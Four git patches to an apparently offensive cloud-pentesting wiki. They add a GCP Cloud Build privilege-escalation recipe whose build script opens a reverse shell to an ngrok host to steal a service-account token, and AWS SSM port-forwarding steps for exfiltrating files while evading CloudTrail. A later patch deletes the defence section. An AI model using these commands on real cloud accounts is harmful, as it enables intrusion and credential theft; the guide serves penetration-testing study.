From 65da889db0f59f4f1174443c59d448c9685f7ba8 Mon Sep 17 00:00:00 2001 From: hasshido Date: Wed, 30 Jul 2025 21:00:52 +0200 Subject: [PATCH 1/4] Update cloudbuild.builds.create exploitation method Includes direct gcloud command descriptioon to exploit this permission. --- .../gcp-cloudbuild-privesc.md | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md index c7fe2f0be..5557616d1 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md @@ -15,6 +15,24 @@ For more information about Cloud Build check: With this permission you can **submit a cloud build**. The cloudbuild machine will have in it’s filesystem by **default a token of the cloudbuild Service Account**: `@cloudbuild.gserviceaccount.com`. However, you can **indicate any service account inside the project** in the cloudbuild configuration.\ Therefore, you can just make the machine exfiltrate to your server the token or **get a reverse shell inside of it and get yourself the token** (the file containing the token might change). +#### Direct exploitation via gcloud CLI + +1- Create `cloudbuild.yaml` and modify with your listener data +```yaml +steps: + - name: bash + script: | + #!/usr/bin/env bash + bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14965 0>&1 +options: + logging: CLOUD_LOGGING_ONLY +``` +2- Upload a simple build with no source, the yaml file and specify the SA to use on the build: +```bash +gcloud builds submit --no-source --config="./cloudbuild.yaml" --service-account="projects//serviceAccounts/@.iam.gserviceaccount.com +``` + +#### Using python gcloud library You can find the original exploit script [**here on GitHub**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudbuild.builds.create.py) (but the location it's taking the token from didn't work for me). Therefore, check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/f-cloudbuild.builds.create.sh) and a python script to get a reverse shell inside the cloudbuild machine and [**steal it here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/f-cloudbuild.builds.create.py) (in the code you can find how to specify other service accounts)**.** For a more in-depth explanation, visit [https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/](https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/) From 95f380db6bc71c777dc87e8778e8d68c8f7e7cd7 Mon Sep 17 00:00:00 2001 From: hasshido Date: Wed, 30 Jul 2025 21:13:32 +0200 Subject: [PATCH 2/4] Update gcp-cloudbuild-privesc.md removing cloudbuild.builds.update ### `cloudbuild.builds.update` Currently this permission is listed to **only** be able to be used to use the api method `builds.cancel()` which cannot be abused to change the parameters of an ongoing build References: - https://cloud.google.com/build/docs/iam-roles-permissions#permissions - https://cloud.google.com/build/docs/api/reference/rest/v1/projects.builds/cancel --- .../gcp-privilege-escalation/gcp-cloudbuild-privesc.md | 5 ----- 1 file changed, 5 deletions(-) diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md index 5557616d1..b2d8f5443 100644 --- a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md +++ b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-cloudbuild-privesc.md @@ -37,11 +37,6 @@ You can find the original exploit script [**here on GitHub**](https://github.com For a more in-depth explanation, visit [https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/](https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/) -### `cloudbuild.builds.update` - -**Potentially** with this permission you will be able to **update a cloud build and just steal the service account token** like it was performed with the previous permission (but unfortunately at the time of this writing I couldn't find any way to call that API). - -TODO ### `cloudbuild.repositories.accessReadToken` From 3f16d3c5f34635c6690c9dbada793ed2c80dcf3b Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Wed, 6 Aug 2025 01:38:30 +0000 Subject: [PATCH 3/4] Add content from: How to transfer files in AWS using SSM --- .../README.md | 61 +++++++++++++++++++ 1 file changed, 61 insertions(+) diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md index bfd300c70..38406dd4b 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md @@ -138,6 +138,63 @@ Note that the SSL connections will fail unless you set the `--insecure-skip-tls- Finally, this technique is not specific to attacking private EKS clusters. You can set arbitrary domains and ports to pivot to any other AWS service or a custom application. +--- + +#### Quick Local ↔️ Remote Port Forward (AWS-StartPortForwardingSession) + +If you only need to forward **one TCP port from the EC2 instance to your local host** you can use the `AWS-StartPortForwardingSession` SSM document (no remote host parameter required): + +```bash +aws ssm start-session --target i-0123456789abcdef0 \ + --document-name AWS-StartPortForwardingSession \ + --parameters "portNumber"="8000","localPortNumber"="8000" \ + --region +``` + +The command establishes a bidirectional tunnel between your workstation (`localPortNumber`) and the selected port (`portNumber`) on the instance **without opening any inbound Security-Group rules**. + +Common use cases: + +* **File exfiltration** + 1. On the instance start a quick HTTP server that points to the directory you want to exfiltrate: + + ```bash + python3 -m http.server 8000 + ``` + + 2. From your workstation fetch the files through the SSM tunnel: + + ```bash + curl http://localhost:8000/loot.txt -o loot.txt + ``` + +* **Accessing internal web applications (e.g. Nessus)** + +```bash +# Forward remote Nessus port 8834 to local 8835 +aws ssm start-session --target i-0123456789abcdef0 \ + --document-name AWS-StartPortForwardingSession \ + --parameters "portNumber"="8834","localPortNumber"="8835" +# Browse to http://localhost:8835 +``` + +Tip: Compress and encrypt evidence before exfiltrating it so that CloudTrail does not log the clear-text content: + +```bash +# On the instance +7z a evidence.7z /path/to/files/* -p'Str0ngPass!' +``` + +--- + +**Defence & Detection** + +* Limit who can call `ssm:StartSession` or restrict the allowed SSM documents. +* Enable Session Manager logging to CloudWatch/S3 and monitor for the `AWS-StartPortForwardingSession` document. +* Use VPC endpoints plus traffic inspection to detect unexpected data egress. + + + ### Share AMI ```bash @@ -474,6 +531,10 @@ if __name__ == "__main__": main() ``` +## References + +- [Pentest Partners – How to transfer files in AWS using SSM](https://www.pentestpartners.com/security-blog/how-to-transfer-files-in-aws-using-ssm/) + {{#include ../../../../banners/hacktricks-training.md}} From f0df70528aa15024ca1294e6a5e63a863de505f9 Mon Sep 17 00:00:00 2001 From: SirBroccoli Date: Mon, 18 Aug 2025 16:48:30 +0200 Subject: [PATCH 4/4] Update README.md --- .../aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md | 9 --------- 1 file changed, 9 deletions(-) diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md index 38406dd4b..7583159af 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/README.md @@ -185,15 +185,6 @@ Tip: Compress and encrypt evidence before exfiltrating it so that CloudTrail doe 7z a evidence.7z /path/to/files/* -p'Str0ngPass!' ``` ---- - -**Defence & Detection** - -* Limit who can call `ssm:StartSession` or restrict the allowed SSM documents. -* Enable Session Manager logging to CloudWatch/S3 and monitor for the `AWS-StartPortForwardingSession` document. -* Use VPC endpoints plus traffic inspection to detect unexpected data egress. - - ### Share AMI